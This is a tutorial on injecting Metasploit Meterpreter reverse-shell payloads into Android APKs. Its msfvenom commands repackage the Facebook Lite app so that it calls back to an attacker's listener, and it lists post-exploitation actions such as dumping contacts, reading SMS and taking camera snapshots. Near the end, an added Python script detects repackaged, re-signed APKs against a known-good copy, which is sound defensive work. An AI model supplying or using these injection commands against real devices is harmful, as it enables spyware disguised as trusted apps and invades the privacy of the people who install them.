In this article, I will show you how to inject a few payloads into APK files. I hope it brings you some useful knowledge.
The process of injecting Metasploit payloads into Android applications can be done either manually or automatically. This post examines the automated process. However, if time is not a factor in an engagement, the manual method should be considered.
Before anything else, the payload that will be used to compromise the mobile device needs to be generated. The Metasploit Framework can be used for this, since it can produce a payload and write it out as an APK file.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.87 LPORT=4444 R > facebookLite.apk
Injecting Payloads into an APK
Before injecting the payload into an APK file, we need the target APK file. You can pull APK files from your phone, download them through the Google Play Store, or obtain them from a third party.
There are various scripts publicly available that can inject a Metasploit payload into an Android application. However, in certain scenarios MSFVenom itself can be used to create and inject a Metasploit payload automatically.
# msfvenom -x com.facebook.lite.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=4444 -o facebook.apk
MSFVenom will decompile the application and try to discover the hook point where the payload will be injected. Furthermore, it will poison the application's Android Manifest file with additional permissions that can be used for post-exploitation activities. The output can be seen below:
The APK injector uses Apktool to fully decompile the application, inject the payload, and then recompile and sign it again.
The APK injector will then attempt to inject the payload inside a file and use Apktool again to compile and sign the application.
A Metasploit listener should be configured in order to receive the payload:
From the moment the user installs and opens the modified APK on their phone, the payload executes and a Meterpreter session is returned.
There is a list of tasks that can be performed after exploitation, such as checking whether the device is rooted, dumping the contact list, retrieving the phone's SMS messages, or using the phone's camera to take a snapshot. All of these activities depend on the permissions of the application carrying the payload, which are defined in the Android manifest file.
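The rebuild-and-re-sign steps and the poisoned manifest described above leave traces that a defender can check for. The following added example (not code from the original post) compares a suspect APK against a known-good copy of the same app: an APK is an ordinary zip, so it lists new, removed and modified members and flags whether the META-INF signing block changed. The two sample APKs are constructed in memory for the demo.

```python
# Added example (not from the original post): a repackaged APK is still a zip,
# so new or changed members (classes.dex, a re-signed META-INF) stand out
# against a known-good copy of the same app. Sample APKs below are constructed.
import hashlib
import io
import zipfile

SIGNING_SUFFIXES = (".RSA", ".DSA", ".EC", ".SF", "MANIFEST.MF")


def entry_hashes(apk_bytes: bytes) -> dict:
    """Map each zip member name to the SHA-256 of its contents."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {i.filename: hashlib.sha256(zf.read(i)).hexdigest()
                for i in zf.infolist() if not i.is_dir()}


def diff_apks(original: bytes, suspect: bytes) -> dict:
    """Return added, removed and modified members and whether the signer changed."""
    a, b = entry_hashes(original), entry_hashes(suspect)
    added = sorted(set(b) - set(a))
    removed = sorted(set(a) - set(b))
    modified = sorted(n for n in a.keys() & b.keys() if a[n] != b[n])
    # Any touched signing file under META-INF means the app was re-signed.
    signer_changed = any(n.startswith("META-INF/") and n.endswith(SIGNING_SUFFIXES)
                         for n in added + removed + modified)
    return {"added": added, "removed": removed, "modified": modified,
            "signer_changed": signer_changed}


def build_apk(members: dict) -> bytes:
    """Constructed stand-in APK (a zip with the given members) for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: the store copy and a copy that was rebuilt and re-signed.
ORIGINAL_APK = build_apk({"AndroidManifest.xml": b"manifest-v1",
                          "classes.dex": b"dex-v1",
                          "META-INF/ORIGINAL.RSA": b"cert-vendor"})
SUSPECT_APK = build_apk({"AndroidManifest.xml": b"manifest-v1-extra-permissions",
                         "classes.dex": b"dex-v1-plus-injected-code",
                         "META-INF/REPACK.RSA": b"cert-unknown"})
if __name__ == "__main__":
    print(diff_apks(ORIGINAL_APK, SUSPECT_APK))
```

A changed signer on a build that claims to be the vendor's release is the strongest single indicator; the modified manifest and classes.dex then tell you what was injected.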
You can see the video demo below: